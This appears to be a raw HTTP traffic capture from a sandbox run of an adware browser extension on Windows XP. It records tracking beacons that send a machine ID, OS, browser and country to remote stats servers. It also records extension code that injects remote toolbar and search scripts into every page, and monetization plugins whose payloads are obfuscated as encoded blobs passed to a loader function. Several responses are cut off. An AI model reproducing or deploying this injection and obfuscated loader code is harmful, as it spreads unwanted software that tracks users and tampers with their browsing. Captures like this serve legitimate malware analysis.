Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: 5YWqA/hbsAT52j7 X ANIhfz8LeZSwbzZennRSNr95qyRT5/GOxJxu15bYYT9dyR
x-amz-request-id: 0498DAA53AE4D7AA
Date: Mon, 12 Jan 2015 10:21:19 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=update&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039416&lifetime=13&oldappver=9&oldbgver=1&oldpluginsver=5&rnd=4509 HTTP/1.1
Accept: */*
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: Ua7e9bbvbbCCT1UU bIiJuiUTlKYm66dUzVHP y9fM8Qw6DgdOMqkLlvENZ3CpV4
x-amz-request-id: 8228922C1C267E83
Date: Mon, 12 Jan 2015 10:21:25 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /installer.gif?action=finished&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&xpiver=0_95&crxver=1_26_9&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=AirplaneNetworks&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: A/zmK/7hgaaXBz9PonyEz79wBldwn4ioXtD1LKmI1eMLwSl2i1b3Rd 04pDGV3wy
x-amz-request-id: 3F5834F5D7454D55
Date: Mon, 12 Jan 2015 10:21:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:53 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&app=69129&appver=27&ver=1_35_12_18&version_date=14-12-27&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&upi=ad4be4dbacb148f1afcb2fc4c6d21a95&procid=62D079BFE1B9432A91182E2E2A8C1EF9PI&srcid=001729&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ca&aver=X&installtime=1421039403&lifetime=0&silent=1&crtnm=AirplaneNetworks&procstarttime=1421039403&procruntime=22&rnd=1421039425 HTTP/1.1
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: A3lVDGbw8R9O/TJq2nlst TkRFytz5dj55QfSuffwiB5lh79oRi5t UHQIFNIM9B
x-amz-request-id: 3DE7DD4364A2825D
Date: Mon, 12 Jan 2015 10:21:34 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:44 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /monetization.gif?event=4&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
Host: logs.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:33 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1421058093.dop006.ny2.t,1421058093.cds053.ny2.c
GIF89a.............,...........D..;..
GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:17 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 39
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":38,"country_name":"CA"}HTTP/1.1 200 OK..Date: Mon, 12 Jan 2015 10:21:17 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 39..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":38,"country_name":"CA"}..
GET /plugin/apps/69129/js/na/ie/app_code.js?ver=27&rnd=1521 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713929"
Last-Modified: Thu, 08 Jan 2015 10:45:29 GMT
Cache-Control: max-age=651
Content-Length: 15858
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds044.ny2.c
.. /************************************************************************************. This is your Page Code. The appAPI.ready() code block will be executed on every page load.. For more information please visit our docs site: hXXp://docs.crossrider.com.*************************************************************************************/.HOST = "hXXp://wt.iwebar.com";.TOOLBAR_URL = HOST '/js/toolbar.js';..AFFILIATE_ID = 'NONE';...appAPI.ready(function($) {.../*..if (appAPI.db.get('user_id') === null) {...if (appAPI.db.get('installation') === null){....appAPI.db.set('installation', new Date().getTime());....return;...}...else {....if ((new Date().getTime() - appAPI.db.get('installation')) < 1000 * 60 * 60 * 48){.....//No need to display toolbar... hasn't been 2 days yet......return;....} ...}..}*/...console.log("=======> Extension [version: " appAPI.appInfo.version "] loading...");....// Set the affiliate ID. //appAPI.db.set('affiliate_id', AFFILIATE_ID);...// Include the Base64 library..appAPI.resources.includeJS('jquery.base64.js');..appAPI.resources.includeJS('jquery-1.10.2.min.js');..appAPI.resources.includeJS('md5.js');..//appAPI.resources.includeJS('i2v.js');....appAPI.resources.includeJS('jw_whitelist_1.js');..appAPI.resources.includeJS('jw_whitelist_2.js');..appAPI.dom.addRemoteJS('hXXp://wt.iwebar.com/js/jw_whitelist_3.js');.....var pObj = sendReport();..../** Custom injections **/..appAPI.resources.includeJS('askcom.js');..function customInjections(country) {...try {....// Ask.co
<<< skipped >>>
GET /plugin/apps/69129/plugins/na/ie/plugins.json?ver=23&rnd=5437 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420713930"
Last-Modified: Thu, 08 Jan 2015 10:45:30 GMT
Cache-Control: max-age=652
Content-Length: 17999
Content-Type: text/plain; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds051.ny2.c
{.."plugins_version": 23,.."plugins_list":. [. {"id":1,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/1.js","ver":11,"name":"base","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":10400},{"run_at":2,"order":10400}],"enabled":true},{"id":4,"url":"hXXp://js.newstatsdemosrv.com/plugins/javascripts/jquery-1_7_1_min.js","ver":5,"name":"jquery_1_7_1","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":true,"px":true},"targets":[{"run_at":1,"order":10200},{"run_at":0,"order":100},{"run_at":5,"order":100},{"run_at":2,"order":10200}],"enabled":true},{"id":2,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/2.js","ver":2,"name":"ie8_fix_1","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10100},{"run_at":2,"order":10100}],"enabled":true},{"id":3,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/3.js","ver":2,"name":"ie8_fix_2","browsers":{"ie":true,"ff":false,"ch":false,"sf":false,"nv":false,"px":false},"targets":[{"run_at":1,"order":10300},{"run_at":2,"order":10300}],"enabled":true},{"id":28,"url":"hXXp://js.newstatsdemosrv.com/plugins/mins/28.js","ver":4,"name":"initializer","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"px":false},"targets":[{"run_at":1,"order":999999999},{"run_at":2,"order":999999999}],"enabled":true},{"id":21,"url":"http://js.newstatsdemosrv.com/plugins/mins/21.js","ver":5,"name":"debug","browsers":{"ie":true,"ff":true,"ch":true,"sf":true,"nv":false,"p
<<< skipped >>>
GET /plugins/mins/356.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1418564745"
Last-Modified: Sun, 14 Dec 2014 13:45:45 GMT
Cache-Control: max-age=20
Content-Length: 407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds012.ny2.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[356]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(356,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"MAN"}))();};....
GET /plugins/mins/193.js?ver=9&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273131"
Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
Cache-Control: max-age=804
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop002.ny2.t,1421058084.cds009.ny2.c
if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }....
GET /plugins/mins/288.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404660469"
Last-Modified: Sun, 06 Jul 2014 15:27:49 GMT
Cache-Control: max-age=451
Content-Length: 551
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop002.ny2.t,1421058083.cds004.ny2.c
if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMDMxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFmMGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNzU5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkzMzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1MjEzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZDE2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }....
GET /plugins/mins/184.js?ver=11&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1420026483"
Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
Cache-Control: max-age=205
Content-Length: 1231
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop002.ny2.t,1421058084.cds013.ny2.c
if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMWQxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFmNWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyODFkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMzYwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFjNWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyNDA4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2MzNDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NGQ0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQyMTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNTQ0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMDcxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZjA4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0MzczZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNTU1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }..
<<< skipped >>>
GET /stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 HTTP/1.1
Accept: */*
Host: stats.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: qMg0Euses8OGBO03Gf2RtEI4hB2UE6umJ6UcUQCqMJkI7rL4hUOZpdc3VYKbg/B
x-amz-request-id: 00E59B0A66C91640
Date: Mon, 12 Jan 2015 10:21:28 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 25 Feb 2014 00:10:58 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411293488"
Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
Cache-Control: max-age=783
Content-Length: 1075
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds045.ny2.c
if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMDAxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0NDJkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3MzkyZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMzUzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYTMzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MTkwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0NDFlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQyZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMzgzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNiMjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIwZjA4M2QwMDQ5NDg0MTU1NDE1NzZjMWI=', 'dkragwefft'); }....
GET /plugins/mins/350.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:23 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417707239"
Last-Modified: Thu, 04 Dec 2014 15:33:59 GMT
Cache-Control: max-age=694
Content-Length: 1799
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058083.dop005.ny2.t,1421058083.cds012.ny2.c
if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMGUxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFiMTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOTBmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMzMjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2MjMyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0NDA0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEyZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMzMmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNjMxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMzMjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMzMwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQwNDU5MTY0NDEzMWQ0ZDA1MWIwZjE1MTcxMzBkMTcyNzE2NWIyNTNkMjYyNDM1MzkyYTNjM2IyMjNmMzAzYTM1M2IyNzI5MzEzYjIyMjUzZDQzMTUxNTFmMTcxYTAwMWYzOTBkMDExMzQ3MzUyNjJkMjAyOTI5MzEzNzNmM2UyZjJiMzEzMTI5MmYyYzMxMjQyMzM1M2EyMTM2MjMyNTNkNDMxNDA4MDUwZTFkMTcxNDM5MGQwMTEzNDczNTI2MmQyMDI5MjkzMTM3M2YzZTJmMmIzMTMwMzQzNTM1MzYzMzI4MzUyNjQ4MTMxNjBhMmIyMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMzYyNTJiMjEyOTI1NGMxODFlMDIyODFiMGYwMDRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMzYyNTJjMjQzYjNmMzUyNjQ4M2IyNDMzMjE1ODI5MjUyOTJiMjEyMTM1MjgyYjIxMzMy
<<< skipped >>>
GET /plugins/mins/337.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1417094308"
Last-Modified: Thu, 27 Nov 2014 13:18:28 GMT
Cache-Control: max-age=675
Content-Length: 407
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,["pops"])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:"TEN"}))();};....
GET /plugins/mins/91.js?ver=118&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newstatsdemosrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:24 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1421049626"
Last-Modified: Mon, 12 Jan 2015 08:00:26 GMT
Cache-Control: max-age=50
Content-Length: 185222
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar=="string"&&typeof ar.trim=="function"){return ar.trim();}return ar==null?"":ar.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au<av;au ){at[ar[au]]=true;}return at;}var H=function(ar,at){var av=[];for(var au=0;au<ar.length;au ){if(au in ar){var aw=at(ar[au],au,ar);if(aw!=null){av.push(aw);}}}return av;};var ad=function(av,ay,au){var at,aw=0,ax=av.length,ar=ax===undefined||appAPI.utils.isFunction(av);if(au){if(ar){for(at in av){if(ay.apply(av[at],au)===false){break;}}}else{for(;aw<ax;){if(ay.apply(av[aw ],au)===false){break;}}}}else{if(ar){for(at in av){if(ay.call(av[at],at,av[at])===false){break;}}}else{for(;aw<ax;){if(ay.call(av[aw],aw,av[aw ])===false){break;}}}}return av;};var J=function(au){au=au?(z[au]||f(au)):{};var az=[],aA=[],av,aw,at,ax,ay,aC=function(aD){var aE,aH,aG,aF,aI;for(aE=0,aH=aD.length;aE<aH;aE ){aG=aD[aE];aF=appAPI.utils.isArray(aG)?"array":(appAPI.utils.isFunction(aG)?"function":"");if(aF==="array"){aC(aG);}else{if(aF==="function"){if(!au.unique||!aB.has(aG)){az.push(aG);}}}}},ar=function(aE,aD){aD=aD||[];av=!au.memory||[aE,aD];aw=true;ay=at||0;at=0;ax=az.length;for(;az&&ay<ax;ay ){if(az[ay].apply(aE,aD)===false&&au.stopOnFalse){av=true;break;}}aw=false;if(az){if(!au.once){if(aA&&aA.length){av=aA.shift();aB.fireWith(av[0],av[1]);}}else{if(av===true){aB.disable();}else{az=[];}}}},aB={add:function(){if(az){var aD=az.leng
<<< skipped >>>
GET /monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
Host: logs.newstatsclientcloud.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Mon, 12 Jan 2015 10:21:18 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1421058078.dop007.ny2.t,1421058078.cds053.ny2.c
GIF89a.............,...........D..;..
GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
